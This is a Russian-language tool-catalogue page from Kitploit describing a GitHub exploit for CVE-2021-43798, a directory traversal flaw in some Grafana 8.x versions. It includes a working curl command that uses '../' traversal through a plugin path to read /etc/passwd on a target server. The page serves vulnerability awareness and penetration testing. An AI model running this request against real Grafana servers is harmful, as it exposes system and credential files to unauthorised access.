Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2021-43798 — Автор: PrivacyHunter | Kitploit
Инструменты/GitHubGitHub/shoxake17/cve-2021-43798
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииТестирование на Проникновение
GitHubshoxake17/cve-2021-43798

CVE-2021-43798

Автор: PrivacyHunter

Репозиторий
5 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2021-43798 от Privacy Hunter

Затронутые версии: с Grafana 8.0.0-beta1 по 8.3.0 (за исключением исправленных версий)

Тип уязвимости: Directory Traversal (Обход каталога)

Уровень опасности: Критический (Critical)

Платформа: Grafana (платформа с открытым исходным кодом для мониторинга и наблюдаемости)

⚠️ Подробности уязвимости В Grafana обход каталога может быть выполнен через следующий URL:

Код http://<grafana_host>/public/plugins// С помощью этого атакующий может читать локальные файлы на сервере. Например, несанкционированный доступ к /etc/passwd или конфигурационным файлам.

🔥 Пример эксплуатации Чтение файла с помощью простого запроса:

bash curl http://target:3000/public/plugins/alertlist/../../../../../../../../etc/passwd С помощью приведённого выше запроса можно получить список пользователей в системе Linux.

Скачать инструмент